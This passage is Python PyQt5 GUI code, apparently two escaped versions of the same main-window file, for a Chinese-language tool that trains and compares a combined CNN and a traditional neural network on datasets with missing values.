QPushButton('设置数据缺失参数')\n self.dataLossSimulateSettingButtonT.setFont(QFont('微软雅黑', 16))\n self.dataPreProcessButtonT = QPushButton('数据预处理')\n self.dataPreProcessButtonT.setFont(QFont('微软雅黑', 16))\n self.dataShowButtonT = QPushButton('展示数据')\n self.dataShowButtonT.setFont(QFont('微软雅黑', 16))\n\n label = QLabel('Present Data:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentDataNameT = QLabel('None')\n self.presentDataNameT.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentDataNameT)\n\n dataModuleT.addStretch(1)\n dataModuleT.addLayout(labelbox)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataFileChooseButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataLossSimulateSettingButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataPreProcessButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataShowButtonT)\n dataModuleT.addStretch(1)\n\n ###### training module ########\n trainingModuleT = QVBoxLayout()\n\n self.setModelParametersButtonT = QPushButton('Model Parameters')\n self.setModelParametersButtonT.setFont(QFont('微软雅黑', 16))\n self.trainingButtonT = QPushButton('Training')\n self.trainingButtonT.setFont(QFont('微软雅黑', 16))\n self.saveModelButtonT = QPushButton('Save Model')\n self.saveModelButtonT.setFont(QFont('微软雅黑', 16))\n self.loadModelButtonT = QPushButton('Load Model')\n self.loadModelButtonT.setFont(QFont('微软雅黑', 16))\n\n label = QLabel('Present Model:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentModelNameT = QLabel('None')\n self.presentModelNameT.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentModelNameT)\n\n trainingModuleT.addStretch(1)\n trainingModuleT.addLayout(labelbox)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.setModelParametersButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.trainingButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.saveModelButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.loadModelButtonT)\n trainingModuleT.addStretch(1)\n\n ############## traditional nn result show ######\n resultShowModuleT = QVBoxLayout()\n\n self.showResultButtonT = QPushButton('分类结果展示')\n self.showResultButtonT.setFont(QFont('微软雅黑', 16))\n self.judgeResultButtonT = QPushButton('分类结果评估')\n self.judgeResultButtonT.setFont(QFont('微软雅黑', 16))\n\n resultShowModuleT.addWidget(self.showResultButtonT)\n resultShowModuleT.addWidget(self.judgeResultButtonT)\n\n ####### traditional algorithm #########\n hboxBottom = QHBoxLayout(self)\n hboxBottom.addStretch(1)\n\n traditionNNLabel = QLabel('Traditional NN:')\n traditionNNLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))\n hboxBottom.addWidget(traditionNNLabel)\n\n hboxBottom.addStretch(1)\n\n hboxBottom.addLayout(dataModuleT)\n\n hboxBottom.addStretch(1)\n\n hboxBottom.addLayout(trainingModuleT)\n\n hboxBottom.addStretch(1)\n\n hboxBottom.addLayout(resultShowModuleT)\n\n hboxBottom.addStretch(1)\n\n ########## whole frame layout ########\n splitterLine = QLabel(self)\n splitterLine.setFont(QFont('Times', 1))\n col = QColor(0, 0, 0)\n splitterLine.setStyleSheet(\"QWidget { background-color: %s }\" % col.name())\n splitterLine.resize(splitterLine.sizeHint())\n\n vbox = QVBoxLayout()\n vbox.addLayout(hboxTop)\n # vbox.addWidget(QLabel(str('_'*int(self.width()/3))))\n vbox.addWidget(splitterLine)\n vbox.addLayout(hboxBottom)\n\n mainWidget = QWidget()\n mainWidget.setLayout(vbox)\n\n self.setCentralWidget(mainWidget)\n\n self.setGeometry(350, 100, self.windowLength, self.windowHigh)\n self.setWindowTitle('适用于有缺失值数据集的神经网络系统')\n self.show()\n\n def initConnect(self):\n\n self.dataFileChooseButton.clicked.connect(self.chooseData)\n self.dataFileChooseButtonT.clicked.connect(self.chooseData)\n self.dataLossSimulateSettingButton.clicked.connect(self.setLossParameter)\n self.dataLossSimulateSettingButtonT.clicked.connect(self.setLossParameter)\n self.dataShowButton.clicked.connect(self.showData)\n self.dataShowButtonT.clicked.connect(self.showData)\n self.dataPreProcessButtonT.clicked.connect(self.preProcess)\n\n self.setModelParametersButton.clicked.connect(self.setModelParameters)\n self.setModelParametersButtonT.clicked.connect(self.setModelParameters)\n self.trainingButton.clicked.connect(self.training)\n self.trainingButtonT.clicked.connect(self.training)\n self.saveModelButton.clicked.connect(self.saveModel)\n self.saveModelButtonT.clicked.connect(self.saveModel)\n self.loadModelButton.clicked.connect(self.loadModel)\n self.loadModelButtonT.clicked.connect(self.loadModel)\n\n self.showResultButton.clicked.connect(self.showResult)\n self.showResultButtonT.clicked.connect(self.showResult)\n self.judgeResultButton.clicked.connect(self.showJudge)\n self.judgeResultButtonT.clicked.connect(self.showJudge)\n\n\n############ data load module #####################\n def chooseData(self):\n if self.sender() is self.dataFileChooseButton:\n self.fname['New'], ok = QFileDialog.getOpenFileName(self, 'Open file', '..', 'Text files (*.txt)')\n if ok:\n # dataname = self.fname['New'].split('/')[-1].split('.')[0]\n # # print(dataname)\n # self.presentDataName.setText(dataname)\n # self.presentDataName.resize(self.presentDataName.sizeHint())\n self.loadData()\n\n elif self.sender() is self.dataFileChooseButtonT:\n self.fname['Tra'], ok = QFileDialog.getOpenFileName(self, 'Open file', '..', 'Text files (*.txt)')\n if ok:\n # dataname = self.fname['Tra'].split('/')[-1].split('.')[0]\n # # print(dataname)\n # self.presentDataNameT.setText(dataname)\n # self.presentDataNameT.resize(self.presentDataNameT.sizeHint())\n self.loadData()\n\n return\n\n\n def loadData(self):\n if self.sender() is self.dataFileChooseButton:\n try:\n self.dataFor['New'] = myLoadData.loadData(self.fname['New'], self.dataLossRate['New'], self.dataSetLossValue['New'])\n # print(self.dataFor['New'].DataTrainX, '\\n', self.dataFor['New'].DataTrainY)\n\n except FileNotFoundError as e:\n reply = QMessageBox.information(self, 'Message', \"Data file not exist\",\n QMessageBox.Yes, QMessageBox.Yes)\n return\n\n except Exception:\n reply = QMessageBox.information(self, 'Message', \"Data file format error\",\n QMessageBox.Yes, QMessageBox.Yes)\n return\n\n dataname = self.fname['New'].split('/')[-1].split('.')[0]\n # print(dataname)\n self.presentDataName.setText(dataname)\n self.presentDataName.resize(self.presentDataName.sizeHint())\n\n elif self.sender() is self.dataFileChooseButtonT:\n try:\n self.dataFor['Tra'] = myLoadData.loadData(self.fname['Tra'], self.dataLossRate['Tra'], self.dataSetLossValue['Tra'])\n # print(self.dataFor['Tra'].DataTrainX, '\\n', self.dataFor['Tra'].DataTrainY)\n\n except FileNotFoundError as e:\n reply = QMessageBox.information(self, 'Message', \"Data file not exist\",\n QMessageBox.Yes, QMessageBox.Yes)\n return\n\n except Exception:\n reply = QMessageBox.information(self, 'Message', \"Data file format error\",\n QMessageBox.Yes, QMessageBox.Yes)\n return\n\n dataname = self.fname['Tra'].split('/')[-1].split('.')[0]\n # print(dataname)\n self.presentDataNameT.setText(dataname)\n self.presentDataNameT.resize(self.presentDataNameT.sizeHint())\n\n return\n\n def setLossParameter(self):\n if self.sender() is self.dataLossSimulateSettingButton:\n self.setLPDialog = setLossParameterDialog.setLossParameterDialog('combine-CNN设置缺失参数', self, 'New')\n\n elif self.sender() is self.dataLossSimulateSettingButtonT:\n self.setLPDialog = setLossParameterDialog.setLossParameterDialog('traditional NN设置缺失参数', self, 'Tra')\n\n # print(self.dataLossRate)\n # print(self.dataSetLossValue)\n return\n\n def showData(self):\n if self.sender() is self.dataShowButton:\n # print(1)\n self.showDataW = showDataWidget.ShowDataWidget('combine-CNN数据展示', self, 'New')\n\n elif self.sender() is self.dataShowButtonT:\n # print(1)\n self.showDataW = showDataWidget.ShowDataWidget('traditional NN数据展示', self, 'Tra')\n return\n\n def preProcess(self):\n if self.dataFor['Tra'] is None:\n reply = QMessageBox.information(self, '数据错误', '没有加载数据,无法预处理',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n self.dataFor['Tra'].MeanPreProcess()\n reply = QMessageBox.information(self, 'Message', 'PreProcess succeed!',\n QMessageBox.Yes, QMessageBox.Yes)\n\n return\n\n ############## training module #################\n def setModelParameters(self):\n if self.sender() is self.setModelParametersButton:\n # print(1)\n self.setModelParaW = setModelParametersDialog.setLossParameterDialog('combine-CNN模型参数设置', self, 'New')\n\n elif self.sender() is self.setModelParametersButtonT:\n self.setModelParaW = setModelParametersDialog.setLossParameterDialog('traditional NN模型参数设置', self, 'Tra')\n\n def training(self):\n if self.sender() is self.trainingButton:\n if self.trainingW is not None:\n self.trainingW.hide()\n # print(self.trainingW)\n self.trainingW.show()\n return\n senderName = 'New'\n\n elif self.sender() is self.trainingButtonT:\n if self.trainingWT is not None:\n self.trainingWT.hide()\n self.trainingWT.show()\n\n senderName = 'Tra'\n\n if self.dataFor[senderName] is None:\n reply = QMessageBox.information(self, '数据错误', '没有加载数据,无法训练',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n\n elif senderName == 'New':\n if self.dataFor[senderName].DataTrainX.shape[1] < self.combineNumConv:\n reply = QMessageBox.information(self, '参数错误', '卷积层组合(卷积核)大小大于数据集特征数量',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n\n if combineNumCalculate.combineNumCal(self.dataFor[senderName].DataTrainX.shape[1], self.combineNumConv)\\\n < self.combineNumPooling:\n reply = QMessageBox.information(self, '参数错误', '池化层组合(池化核)大小大于卷积层输出特征向量维度',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n\n # print(self.trainingW)\n if self.trainingWT is not None:\n reply = QMessageBox.information(self, '提示', 'traditional NN训练正在进行,请等待其结束',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n\n self.trainingW = TrainingWidget.trainningWidget('combine-CNN训练', self, senderName)\n self.traingWidgetOnFlag[senderName] = False\n\n elif senderName == 'Tra':\n if self.trainingW is not None:\n reply = QMessageBox.information(self, '提示', 'combine-CNN训练正在进行,请等待其结束',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n\n self.trainingWT = TrainingWidget.trainningWidget('traditional NN训练', self, senderName)\n self.traingWidgetOnFlag[senderName] = False\n\n return\n\n def saveModel(self):\n if self.sender() is self.saveModelButton:\n if self.mcbcnn is None:\n reply = QMessageBox.information(self, '模型错误', '模型不存在',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n else:\n fname, ok = QFileDialog.getSaveFileName(self, 'Save Model', '..\\\\myCombineCNN.cbcnn.json',\n 'Combine-CNN json files (*.cbcnn.json)')\n if ok:\n succeed = self.mcbcnn.saveModel(fname)\n if succeed:\n reply = QMessageBox.information(self, '保存结果', '模型保存成功',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n\n elif self.sender() is self.saveModelButtonT:\n if self.trann is None:\n reply = QMessageBox.information(self, '模型错误', '模型不存在',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n else:\n fname, ok = QFileDialog.getSaveFileName(self, 'Save Model', '..\\\\traditionalNN.trann.json',\n 'Traditional NN json files (*.trann.json)')\n if ok:\n succeed = self.trann.saveModel(fname)\n if succeed:\n reply = QMessageBox.information(self, '保存结果', '模型保存成功',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n\n\n def loadModel(self):\n if self.sender() is self.loadModelButton:\n fname, ok = QFileDialog.getOpenFileName(self, 'Load Model', '..',\n 'Combine-CNN json files (*.cbcnn.json)')\n if ok:\n if self.mcbcnn is None:\n self.mcbcnn = myCombineCNN.myCombineCNN(None, self.combineNumConv, self.convCoreNum, self.combineNumPooling)\n\n succeed = self.mcbcnn.setModel(fname)\n if succeed:\n modelName = fname.split('/')[-1].split('.')[0]\n self.presentModelName.setText(modelName)\n\n reply = QMessageBox.information(self, '设置结果', '模型设置成功',\n QMessageBox.Yes, QMessageBox.Yes)\n\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n\n elif self.sender() is self.loadModelButtonT:\n fname, ok = QFileDialog.getOpenFileName(self, 'Load Model', '..',\n 'Traditional NN json files (*.trann.json)')\n if ok:\n if self.trann is None:\n self.trann = traditionalNN.traditionalNN(None)\n\n succeed = self.trann.setModel(fname)\n if succeed:\n modelName = fname.split('/')[-1].split('.')[0]\n self.presentModelNameT.setText(modelName)\n\n reply = QMessageBox.information(self, '设置结果', '模型设置成功',\n QMessageBox.Yes, QMessageBox.Yes)\n\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n\n return\n\n def showResult(self):\n\n if self.sender() is self.showResultButton:\n if self.traingWidgetOnFlag['New']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n\n self.showResultW = showResultWidget.ShowResultWidget('combine-CNN预测结果展示', self, 'New')\n\n elif self.sender() is self.showResultButtonT:\n if self.traingWidgetOnFlag['Tra']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n\n self.showResultW = showResultWidget.ShowResultWidget('traditional NN预测结果展示', self, 'Tra')\n\n return\n\n def showJudge(self):\n if self.sender() is self.judgeResultButton:\n\n if self.traingWidgetOnFlag['New']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n\n self.chooseJDWin = chooseJudgeDataSetWidget.chooseJudgeDataSetWidget('Choose Judgement-based-on Data Set',\n self, 'New')\n\n elif self.sender() is self.judgeResultButtonT:\n\n if self.traingWidgetOnFlag['Tra']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n\n self.chooseJDWin = chooseJudgeDataSetWidget.chooseJudgeDataSetWidget('Choose Judgement-based-on Data Set',\n self, 'Tra')\n # self.testw = showJudgeWidgets.judgeWidget('test', self, 'New', 'Train')\n # self.mcbcnn.runCNN('Test', self.dataFor['New'])\n # drawCM = Judgement.myJudge(self.mcbcnn.data.yClassDic, self.mcbcnn.getAccuratePredictResult().argmax(1), self.mcbcnn.data.DataTestY.argmax(1))\n # drawCM.plotConfuseMatrix()\n\n\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n myMainWindow = MyMainWindow()\n sys.exit(app.exec_())", "import sys\nfrom PyQt5.QtWidgets import QMainWindow, QWidget, QHBoxLayout, QVBoxLayout, QFrame, QSplitter, QStyleFactory, QApplication, QPushButton, QTextEdit, QLabel, QFileDialog, QMessageBox\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtGui import QFont, QColor\nimport myLoadData\nfrom UIPack import setLossParameterDialog, showDataWidget, setModelParametersDialog, TrainingWidget, showResultWidget, showJudgeWidgets, chooseJudgeDataSetWidget\nfrom MyCombCNNPack import combineNumCalculate, myCombineCNN, traditionalNN, Judgement\n\n\nclass MyMainWindow(QMainWindow):\n\n def __init__(self):\n super().__init__()\n self.windowLength = 1250\n self.windowHigh = 900\n self.fname = dict()\n self.fname['New'] = None\n self.fname['Tra'] = None\n self.dataLossRate = dict()\n self.dataSetLossValue = dict()\n self.dataFor = dict()\n self.dataFor['New'] = None\n self.dataLossRate['New'] = 0.0\n self.dataSetLossValue['New'] = 0.0\n self.dataFor['Tra'] = None\n self.dataLossRate['Tra'] = 0.0\n self.dataSetLossValue['Tra'] = 0.0\n self.traingWidgetOnFlag = dict()\n self.traingWidgetOnFlag['New'] = False\n self.traingWidgetOnFlag['Tra'] = False\n self.combineNumConv = 2\n self.convCoreNum = 5\n self.combineNumPooling = 4\n self.fullConnectOutInRate = 0.5\n self.mcbcnn = None\n self.trann = None\n self.trainingW = None\n self.trainingWT = None\n self.initUI()\n self.initConnect()\n\n def initUI(self):\n self.statusBar().showMessage('Ready')\n dataModule = QVBoxLayout()\n self.dataFileChooseButton = QPushButton('选择数据')\n self.dataFileChooseButton.setFont(QFont('微软雅黑', 16))\n self.dataLossSimulateSettingButton = QPushButton('设置数据缺失参数')\n self.dataLossSimulateSettingButton.setFont(QFont('微软雅黑', 16))\n self.dataShowButton = QPushButton('展示数据')\n self.dataShowButton.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Data:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentDataName = QLabel('None')\n self.presentDataName.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentDataName)\n dataModule.addStretch(1)\n dataModule.addLayout(labelbox)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataFileChooseButton)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataLossSimulateSettingButton)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataShowButton)\n dataModule.addStretch(1)\n trainingModule = QVBoxLayout()\n self.setModelParametersButton = QPushButton('Model Parameters')\n self.setModelParametersButton.setFont(QFont('微软雅黑', 16))\n self.trainingButton = QPushButton('Training')\n self.trainingButton.setFont(QFont('微软雅黑', 16))\n self.saveModelButton = QPushButton('Save Model')\n self.saveModelButton.setFont(QFont('微软雅黑', 16))\n self.loadModelButton = QPushButton('Load Model')\n self.loadModelButton.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Model:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentModelName = QLabel('None')\n self.presentModelName.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentModelName)\n trainingModule.addStretch(1)\n trainingModule.addLayout(labelbox)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.setModelParametersButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.trainingButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.saveModelButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.loadModelButton)\n trainingModule.addStretch(1)\n resultShowModule = QVBoxLayout()\n self.showResultButton = QPushButton('分类结果展示')\n self.showResultButton.setFont(QFont('微软雅黑', 16))\n self.judgeResultButton = QPushButton('分类结果评估')\n self.judgeResultButton.setFont(QFont('微软雅黑', 16))\n resultShowModule.addWidget(self.showResultButton)\n resultShowModule.addWidget(self.judgeResultButton)\n hboxTop = QHBoxLayout()\n hboxTop.addStretch(1)\n mcnnLabel = QLabel('Combine-CNN:')\n mcnnLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))\n hboxTop.addWidget(mcnnLabel)\n hboxTop.addStretch(1)\n hboxTop.addLayout(dataModule)\n hboxTop.addStretch(1)\n hboxTop.addLayout(trainingModule)\n hboxTop.addStretch(1)\n hboxTop.addLayout(resultShowModule)\n hboxTop.addStretch(1)\n dataModuleT = QVBoxLayout()\n self.dataFileChooseButtonT = QPushButton('选择数据')\n self.dataFileChooseButtonT.setFont(QFont('微软雅黑', 16))\n self.dataLossSimulateSettingButtonT = QPushButton('设置数据缺失参数')\n self.dataLossSimulateSettingButtonT.setFont(QFont('微软雅黑', 16))\n self.dataPreProcessButtonT = QPushButton('数据预处理')\n self.dataPreProcessButtonT.setFont(QFont('微软雅黑', 16))\n self.dataShowButtonT = QPushButton('展示数据')\n self.dataShowButtonT.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Data:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentDataNameT = QLabel('None')\n self.presentDataNameT.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentDataNameT)\n dataModuleT.addStretch(1)\n dataModuleT.addLayout(labelbox)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataFileChooseButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataLossSimulateSettingButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataPreProcessButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataShowButtonT)\n dataModuleT.addStretch(1)\n trainingModuleT = QVBoxLayout()\n self.setModelParametersButtonT = QPushButton('Model Parameters')\n self.setModelParametersButtonT.setFont(QFont('微软雅黑', 16))\n self.trainingButtonT = QPushButton('Training')\n self.trainingButtonT.setFont(QFont('微软雅黑', 16))\n self.saveModelButtonT = QPushButton('Save Model')\n self.saveModelButtonT.setFont(QFont('微软雅黑', 16))\n self.loadModelButtonT = QPushButton('Load Model')\n self.loadModelButtonT.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Model:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentModelNameT = QLabel('None')\n self.presentModelNameT.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentModelNameT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addLayout(labelbox)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.setModelParametersButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.trainingButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.saveModelButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.loadModelButtonT)\n trainingModuleT.addStretch(1)\n resultShowModuleT = QVBoxLayout()\n self.showResultButtonT = QPushButton('分类结果展示')\n self.showResultButtonT.setFont(QFont('微软雅黑', 16))\n self.judgeResultButtonT = QPushButton('分类结果评估')\n self.judgeResultButtonT.setFont(QFont('微软雅黑', 16))\n resultShowModuleT.addWidget(self.showResultButtonT)\n resultShowModuleT.addWidget(self.judgeResultButtonT)\n hboxBottom = QHBoxLayout(self)\n hboxBottom.addStretch(1)\n traditionNNLabel = QLabel('Traditional NN:')\n traditionNNLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))\n hboxBottom.addWidget(traditionNNLabel)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(dataModuleT)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(trainingModuleT)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(resultShowModuleT)\n hboxBottom.addStretch(1)\n splitterLine = QLabel(self)\n splitterLine.setFont(QFont('Times', 1))\n col = QColor(0, 0, 0)\n splitterLine.setStyleSheet('QWidget { background-color: %s }' % col\n .name())\n splitterLine.resize(splitterLine.sizeHint())\n vbox = QVBoxLayout()\n vbox.addLayout(hboxTop)\n vbox.addWidget(splitterLine)\n vbox.addLayout(hboxBottom)\n mainWidget = QWidget()\n mainWidget.setLayout(vbox)\n self.setCentralWidget(mainWidget)\n self.setGeometry(350, 100, self.windowLength, self.windowHigh)\n self.setWindowTitle('适用于有缺失值数据集的神经网络系统')\n self.show()\n\n def initConnect(self):\n self.dataFileChooseButton.clicked.connect(self.chooseData)\n self.dataFileChooseButtonT.clicked.connect(self.chooseData)\n self.dataLossSimulateSettingButton.clicked.connect(self.\n setLossParameter)\n self.dataLossSimulateSettingButtonT.clicked.connect(self.\n setLossParameter)\n self.dataShowButton.clicked.connect(self.showData)\n self.dataShowButtonT.clicked.connect(self.showData)\n self.dataPreProcessButtonT.clicked.connect(self.preProcess)\n self.setModelParametersButton.clicked.connect(self.setModelParameters)\n self.setModelParametersButtonT.clicked.connect(self.setModelParameters)\n self.trainingButton.clicked.connect(self.training)\n self.trainingButtonT.clicked.connect(self.training)\n self.saveModelButton.clicked.connect(self.saveModel)\n self.saveModelButtonT.clicked.connect(self.saveModel)\n self.loadModelButton.clicked.connect(self.loadModel)\n self.loadModelButtonT.clicked.connect(self.loadModel)\n self.showResultButton.clicked.connect(self.showResult)\n self.showResultButtonT.clicked.connect(self.showResult)\n self.judgeResultButton.clicked.connect(self.showJudge)\n self.judgeResultButtonT.clicked.connect(self.showJudge)\n\n def chooseData(self):\n if self.sender() is self.dataFileChooseButton:\n self.fname['New'], ok = QFileDialog.getOpenFileName(self,\n 'Open file', '..', 'Text files (*.txt)')\n if ok:\n self.loadData()\n elif self.sender() is self.dataFileChooseButtonT:\n self.fname['Tra'], ok = QFileDialog.getOpenFileName(self,\n 'Open file', '..', 'Text files (*.txt)')\n if ok:\n self.loadData()\n return\n\n def loadData(self):\n if self.sender() is self.dataFileChooseButton:\n try:\n self.dataFor['New'] = myLoadData.loadData(self.fname['New'],\n self.dataLossRate['New'], self.dataSetLossValue['New'])\n except FileNotFoundError as e:\n reply = QMessageBox.information(self, 'Message',\n 'Data file not exist', QMessageBox.Yes, QMessageBox.Yes)\n return\n except Exception:\n reply = QMessageBox.information(self, 'Message',\n 'Data file format error', QMessageBox.Yes, QMessageBox.Yes)\n return\n dataname = self.fname['New'].split('/')[-1].split('.')[0]\n self.presentDataName.setText(dataname)\n self.presentDataName.resize(self.presentDataName.sizeHint())\n elif self.sender() is self.dataFileChooseButtonT:\n try:\n self.dataFor['Tra'] = myLoadData.loadData(self.fname['Tra'],\n self.dataLossRate['Tra'], self.dataSetLossValue['Tra'])\n except FileNotFoundError as e:\n reply = QMessageBox.information(self, 'Message',\n 'Data file not exist', QMessageBox.Yes, QMessageBox.Yes)\n return\n except Exception:\n reply = QMessageBox.information(self, 'Message',\n 'Data file format error', QMessageBox.Yes, QMessageBox.Yes)\n return\n dataname = self.fname['Tra'].split('/')[-1].split('.')[0]\n self.presentDataNameT.setText(dataname)\n self.presentDataNameT.resize(self.presentDataNameT.sizeHint())\n return\n\n def setLossParameter(self):\n if self.sender() is self.dataLossSimulateSettingButton:\n self.setLPDialog = setLossParameterDialog.setLossParameterDialog(\n 'combine-CNN设置缺失参数', self, 'New')\n elif self.sender() is self.dataLossSimulateSettingButtonT:\n self.setLPDialog = setLossParameterDialog.setLossParameterDialog(\n 'traditional NN设置缺失参数', self, 'Tra')\n return\n\n def showData(self):\n if self.sender() is self.dataShowButton:\n self.showDataW = showDataWidget.ShowDataWidget('combine-CNN数据展示',\n self, 'New')\n elif self.sender() is self.dataShowButtonT:\n self.showDataW = showDataWidget.ShowDataWidget('traditional NN数据展示'\n , self, 'Tra')\n return\n\n def preProcess(self):\n if self.dataFor['Tra'] is None:\n reply = QMessageBox.information(self, '数据错误', '没有加载数据,无法预处理',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n self.dataFor['Tra'].MeanPreProcess()\n reply = QMessageBox.information(self, 'Message',\n 'PreProcess succeed!', QMessageBox.Yes, QMessageBox.Yes)\n return\n\n def setModelParameters(self):\n if self.sender() is self.setModelParametersButton:\n self.setModelParaW = (setModelParametersDialog.\n setLossParameterDialog('combine-CNN模型参数设置', self, 'New'))\n elif self.sender() is self.setModelParametersButtonT:\n self.setModelParaW = (setModelParametersDialog.\n setLossParameterDialog('traditional NN模型参数设置', self, 'Tra'))\n\n def training(self):\n if self.sender() is self.trainingButton:\n if self.trainingW is not None:\n self.trainingW.hide()\n self.trainingW.show()\n return\n senderName = 'New'\n elif self.sender() is self.trainingButtonT:\n if self.trainingWT is not None:\n self.trainingWT.hide()\n self.trainingWT.show()\n senderName = 'Tra'\n if self.dataFor[senderName] is None:\n reply = QMessageBox.information(self, '数据错误', '没有加载数据,无法训练',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n elif senderName == 'New':\n if self.dataFor[senderName].DataTrainX.shape[1\n ] < self.combineNumConv:\n reply = QMessageBox.information(self, '参数错误',\n '卷积层组合(卷积核)大小大于数据集特征数量', QMessageBox.Yes, QMessageBox.Yes)\n return\n if combineNumCalculate.combineNumCal(self.dataFor[senderName].\n DataTrainX.shape[1], self.combineNumConv\n ) < self.combineNumPooling:\n reply = QMessageBox.information(self, '参数错误',\n '池化层组合(池化核)大小大于卷积层输出特征向量维度', QMessageBox.Yes,\n QMessageBox.Yes)\n return\n if self.trainingWT is not None:\n reply = QMessageBox.information(self, '提示',\n 'traditional NN训练正在进行,请等待其结束', QMessageBox.Yes,\n QMessageBox.Yes)\n return\n self.trainingW = TrainingWidget.trainningWidget('combine-CNN训练',\n self, senderName)\n self.traingWidgetOnFlag[senderName] = False\n elif senderName == 'Tra':\n if self.trainingW is not None:\n reply = QMessageBox.information(self, '提示',\n 'combine-CNN训练正在进行,请等待其结束', QMessageBox.Yes,\n QMessageBox.Yes)\n return\n self.trainingWT = TrainingWidget.trainningWidget('traditional NN训练'\n , self, senderName)\n self.traingWidgetOnFlag[senderName] = False\n return\n\n def saveModel(self):\n if self.sender() is self.saveModelButton:\n if self.mcbcnn is None:\n reply = QMessageBox.information(self, '模型错误', '模型不存在',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n else:\n fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',\n '..\\\\myCombineCNN.cbcnn.json',\n 'Combine-CNN json files (*.cbcnn.json)')\n if ok:\n succeed = self.mcbcnn.saveModel(fname)\n if succeed:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存成功', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存失败', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n 